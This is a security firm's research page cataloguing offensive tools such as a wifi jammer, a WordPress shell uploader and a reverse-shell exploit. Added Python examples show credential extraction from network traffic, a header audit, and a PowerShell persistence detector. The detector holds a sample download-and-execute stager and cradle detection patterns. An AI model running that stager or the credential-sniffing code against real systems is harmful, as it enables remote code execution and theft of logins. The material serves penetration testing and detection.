Research and Development

Malware and Vulnerability Research, Open Source Tools, and Opinions

The Coalfire Labs Research and Development (R&D) team creates cutting-edge, open source security tools to provide more realistic adversary simulations to Coalfire customers, and advances operational tradecraft for the security industry and community.

The Coalfire Labs R&D division identifies previously unknown vulnerabilities, provides firsthand insight into current malware trends and attacker TTPs (Tactics, Techniques and Procedures), and develops and contributes to the security tools commonly used by the security community. The R&D team also builds custom solutions for Coalfire's Red Team and penetration testing operations to provide additional value to customers.

We strive to use our expertise to improve all aspects of information security and to constantly push forward the state of the industry.

Featured Tools

Icebreaker

Break the ice with that cute Active Directory environment over there. When you're cold and alone staring in at an Active Directory party but don't possess even a single AD credential to join the fun, this tool's for you.

https://github.com/danmcinerney/icebreaker

-----------------------------------------------------

Red Baron

Red Baron is a set of modules and custom/third-party providers for Terraform that automates the creation of resilient, disposable, secure, and agile infrastructure for Red Teams while at the same time reducing the amount of code required to do so and making it as accessible as possible.

https://github.com/Coalfire-Research/red-baron

-----------------------------------------------------

Java Deserialization Exploit

A collection of curated Java Deserialization Exploits.

https://github.com/Coalfire-Research/java-deserialization-exploits

-----------------------------------------------------

iOS 11 Jailbreak

This jailbreak works for iOS 11.1.2 (15B202) and enables running unsigned code, a remote shell, full filesystem access, and live kernel memory introspection.

https://github.com/Coalfire-Research/iOS-11.1.2-15B202-Jailbreak

-----------------------------------------------------

CrackMapExec (CME)

A swiss army knife for pentesting networks

https://github.com/byt3bl33d3r/CrackMapExec

-----------------------------------------------------

DeathStar

DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techniques.

https://github.com/byt3bl33d3r/DeathStar

-----------------------------------------------------

Net-creds

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

https://github.com/DanMcInerney/net-creds
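The two properties the blurb above calls out, reassembling fragmented segments before matching and identifying a service by payload content rather than port, are illustrated by the following added example. It is not net-creds' own code: it works on a hand-built list of (sequence number, payload) segments instead of a live interface or pcap, the sample HTTP request and FTP login are constructed for the example, and it recognises only HTTP Basic and FTP credentials.

```python
import base64
import re
from typing import List, Tuple

Segment = Tuple[int, bytes]  # (TCP sequence number, payload)


def reassemble(segments: List[Segment]) -> bytes:
    """Rebuild one direction of a TCP stream from segments that may arrive
    out of order or be retransmitted. Bytes already seen are dropped; a gap
    ends reassembly (a real sniffer would buffer and wait for the hole to fill)."""
    stream = b""
    expected = None
    for seq, data in sorted(segments, key=lambda s: s[0]):
        if expected is None:
            expected = seq
        if seq < expected:              # overlap / retransmission
            data = data[expected - seq:]
            seq = expected
        if seq > expected:              # hole in the stream
            break
        stream += data
        expected = seq + len(data)
    return stream


# Credentials are matched on payload content only; the port the stream was
# seen on is never consulted, so HTTP on 8443 or FTP on 2121 is found as well.
HTTP_BASIC = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I)
FTP_USER = re.compile(rb"^USER (\S+)\r?$", re.M)
FTP_PASS = re.compile(rb"^PASS (\S+)\r?$", re.M)


def extract_credentials(stream: bytes) -> List[Tuple[str, str, str]]:
    """Return (protocol, username, secret) triples found in a reassembled stream."""
    found = []
    for m in HTTP_BASIC.finditer(stream):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
        if ":" in decoded:
            user, password = decoded.split(":", 1)
            found.append(("http-basic", user, password))
    user, password = FTP_USER.search(stream), FTP_PASS.search(stream)
    if user and password:
        found.append(("ftp", user.group(1).decode(), password.group(1).decode()))
    return found


def split_stream(seq0: int, data: bytes, cuts: List[int]) -> List[Segment]:
    """Cut a byte string into segments carrying correct sequence numbers."""
    segments, prev = [], 0
    for cut in list(cuts) + [len(data)]:
        segments.append((seq0 + prev, data[prev:cut]))
        prev = cut
    return segments


# Constructed sample traffic (not from a real capture): an HTTP request whose
# Basic credential is split across two segments, delivered out of order with
# one retransmission, plus an FTP login from a client stream.
HTTP_REQUEST = (b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
                b"Authorization: Basic " + base64.b64encode(b"alice:hunter2") +
                b"\r\nUser-Agent: curl/7.68.0\r\n\r\n")
_segs = split_stream(1000, HTTP_REQUEST, [45, 66, 75])   # cut 75 lands inside the token
DELIVERED = [_segs[2], _segs[0], _segs[1], _segs[3], _segs[1]]
FTP_CLIENT = b"USER bob\r\nPASS s3cret\r\nSYST\r\n"

if __name__ == "__main__":
    for stream in (reassemble(DELIVERED), FTP_CLIENT):
        for proto, user, secret in extract_credentials(stream):
            print(f"[{proto}] {user}:{secret}")
```

Matching the regexes against the raw segments instead of the reassembled stream would miss the Basic credential entirely, since the base64 token straddles a segment boundary; that is the whole reason a sniffer has to reassemble first.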

-----------------------------------------------------

Wifijammer

Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block radius with heavy access point saturation.

https://github.com/DanMcInerney/wifijammer

-----------------------------------------------------

Xsscrapy

Fast, thorough, XSS/SQLi spider. Give it a URL and it'll test every link it finds for cross-site scripting and some SQL injection vulnerabilities. See FAQ for more details about SQLi detection.

https://github.com/DanMcInerney/xsscrapy

-----------------------------------------------------

Pentest machine

Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/.

https://github.com/DanMcInerney/pentest-machine

-----------------------------------------------------

LANs.py

Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.

https://github.com/DanMcInerney/LANs.py

-----------------------------------------------------

Malrule

Quick and painless utility to generate malicious OWA rules.

https://github.com/arch4ngel/malrule

-----------------------------------------------------

sLNKy

sLNKy is a utility that automates the process of generating and dropping malicious LNK files on SMB shares.

https://github.com/arch4ngel/slnky

-----------------------------------------------------

WPForce

WPForce is a suite of WordPress attack tools. It currently contains two scripts: WPForce, which brute-forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post-exploitation modules.

https://github.com/n00py/WPForce

-----------------------------------------------------

pOSt-eX

This script creates a new rule in the OS X Mail application that automatically triggers an AppleScript payload when an email containing a trigger word in its subject is received.

https://github.com/n00py/pOSt-eX

-----------------------------------------------------

Dissonance

This script was designed to spoof a Synergy server and to entice users to connect to it.

https://github.com/n00py/Dissonance

-----------------------------------------------------

Hwacha

Hwacha is a tool to quickly execute payloads on *Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.

https://github.com/n00py/Hwacha

-----------------------------------------------------

HandyHeaderHacker

HandyHeaderHacker is a script to examine HTTP responses from a server for best security practices. You can quickly analyze a web server with a single request.

https://github.com/vpnguy/HandyHeaderHacker
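The kind of check a header audit performs on a single response is shown by the following added example. It is not HandyHeaderHacker's code and does not make a network request: it parses two constructed raw responses (one weak, one hardened) and reports missing or weak HSTS, CSP, clickjacking, MIME-sniffing, cookie-flag and version-disclosure headers. The one-year minimum for HSTS max-age and the specific checks are choices made for the example.

```python
import re
from typing import List, Tuple

Header = Tuple[str, str]

ONE_YEAR = 31536000  # minimum HSTS max-age this example accepts (an assumption)


def parse_response_headers(raw: bytes) -> Tuple[str, List[Header]]:
    """Split a raw HTTP response into its status line and (lowercased name, value)
    pairs; repeated headers such as Set-Cookie are all kept."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers: List[Header] = []
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def values(headers: List[Header], name: str) -> List[str]:
    return [v for n, v in headers if n == name]


def audit_headers(headers: List[Header]) -> List[str]:
    """Return one finding per missing or weak security header."""
    findings: List[str] = []

    hsts = values(headers, "strict-transport-security")
    if not hsts:
        findings.append("missing Strict-Transport-Security")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0], re.I)
        if not m or int(m.group(1)) < ONE_YEAR:
            findings.append("Strict-Transport-Security max-age below one year")
        if "includesubdomains" not in hsts[0].lower():
            findings.append("Strict-Transport-Security lacks includeSubDomains")

    csp = values(headers, "content-security-policy")
    if not csp:
        findings.append("missing Content-Security-Policy")
    elif re.search(r"'unsafe-(inline|eval)'", csp[0]):
        findings.append("Content-Security-Policy allows 'unsafe-inline' or 'unsafe-eval'")

    # Clickjacking: X-Frame-Options or a CSP frame-ancestors directive is acceptable.
    if not values(headers, "x-frame-options") and not any("frame-ancestors" in c for c in csp):
        findings.append("no clickjacking protection (X-Frame-Options or CSP frame-ancestors)")

    if [v.lower() for v in values(headers, "x-content-type-options")] != ["nosniff"]:
        findings.append("X-Content-Type-Options is not set to nosniff")

    for cookie in values(headers, "set-cookie"):
        name = cookie.split("=", 1)[0]
        attrs = [a.strip().lower() for a in cookie.split(";")[1:]]  # attributes only, not the value
        missing = [flag for flag in ("secure", "httponly") if flag not in attrs]
        if missing:
            findings.append(f"cookie {name} missing {', '.join(missing)}")

    # A version string in Server / X-Powered-By is a free fingerprint for an attacker.
    for leaky in ("server", "x-powered-by"):
        for v in values(headers, leaky):
            if re.search(r"\d", v):
                findings.append(f"{leaky} discloses a version: {v}")

    return findings


def audit_raw(raw: bytes) -> List[str]:
    return audit_headers(parse_response_headers(raw)[1])


# Constructed responses for the example (not captured from any real server).
WEAK = (b"HTTP/1.1 200 OK\r\n"
        b"Server: Apache/2.4.29\r\n"
        b"Content-Type: text/html\r\n"
        b"Set-Cookie: session=abc123; Path=/\r\n"
        b"\r\n<html></html>")

HARDENED = (b"HTTP/1.1 200 OK\r\n"
            b"Server: Apache\r\n"
            b"Strict-Transport-Security: max-age=63072000; includeSubDomains\r\n"
            b"Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
            b"X-Content-Type-Options: nosniff\r\n"
            b"Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
            b"\r\n<html></html>")

if __name__ == "__main__":
    for label, resp in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"{label}: {audit_raw(resp) or ['no findings']}")
```

Cookie flags are checked against the attribute list rather than the whole header string so that a cookie value happening to contain "secure" does not mask a missing flag; the same caution applies when extending the checks to Permissions-Policy or Referrer-Policy.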

-----------------------------------------------------

AmazonSecurityScanner

AmazonSecurityScanner (ASS) is a script that scans an EC2 instance for potential AWS-related attack surfaces. It can be used for rapid post-exploitation reconnaissance on a compromised EC2 instance.

https://github.com/vpnguy/AmazonSecurityScanner

-----------------------------------------------------

CrestCrack

CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments CrestCrack will utilize netcat to create a reverse shell between your target and a netcat listener of your choice.

https://github.com/vpnguy/CrestCrack

-----------------------------------------------------

NorkNork

This script was designed to identify PowerShell Empire persistence payloads on Windows systems.

https://github.com/n00py/NorkNork
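As an added example of the detection idea behind a tool like this (not NorkNork's code, and not tied to Empire's actual launcher format), the block below takes autorun command lines such as registry Run values, decodes any PowerShell -EncodedCommand argument from base64/UTF-16LE, and scores the decoded text against a small set of launcher indicators. The indicator list, the sample Run entries and the stager string are assumptions constructed for the example.

```python
import base64
import re
from typing import Dict, List

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# -ex* and -ep* (ExecutionPolicy) are excluded so that "Bypass" is not read as base64.
ENCODED_ARG = re.compile(r"-e(?![xp])[a-z]*\s+([A-Za-z0-9+/=]+)", re.I)

# Generic download-and-execute indicators chosen for this example; they are
# assumptions, not a list taken from NorkNork or from Empire itself.
INDICATORS = [
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("download cradle", re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I)),
    ("base64 stage", re.compile(r"frombase64string", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no profile", re.compile(r"-nop\b|-noprofile", re.I)),
]
# Window/profile switches alone are common in legitimate scripts; only an
# execution indicator makes an entry suspicious.
EXECUTION_INDICATORS = {"invoke-expression", "download cradle", "base64 stage"}


def decode_encoded_command(cmdline: str) -> str:
    """Return the script carried by an -EncodedCommand argument, or '' if none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def assess_command(name: str, cmdline: str) -> Dict:
    """Match indicators against the command line and its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + decoded
    hits = [label for label, pattern in INDICATORS if pattern.search(haystack)]
    return {
        "name": name,
        "decoded": decoded,
        "hits": hits,
        "suspicious": any(h in EXECUTION_INDICATORS for h in hits),
    }


def scan_autoruns(autoruns: Dict[str, str]) -> List[Dict]:
    """autoruns maps an entry name (e.g. a Run value name) to its command line."""
    return [assess_command(name, cmd) for name, cmd in autoruns.items()]


# Constructed sample: a stager-style one-liner wrapped the way a persistence
# module would store it, next to a benign autorun. Not real Empire output.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/launcher')"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()

SAMPLE_AUTORUNS = {
    "Updater": ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                f'-NoP -W Hidden -Enc {ENCODED}'),
    "OneDrive": '"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
}

if __name__ == "__main__":
    for result in scan_autoruns(SAMPLE_AUTORUNS):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{result['name']}: {flag} {result['hits']}")
        if result["decoded"]:
            print(f"  decoded: {result['decoded']}")
```

The same assess_command function can be fed scheduled-task actions or WMI event-consumer command lines; what matters is decoding the payload before matching, since the base64 wrapper hides every keyword from a plain string search.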

-----------------------------------------------------

AngryHippo

This script was designed to attack the HippoConnect protocol which is used with the HippoRemote iPhone app and the HippoConnect listener.

https://github.com/n00py/AngryHippo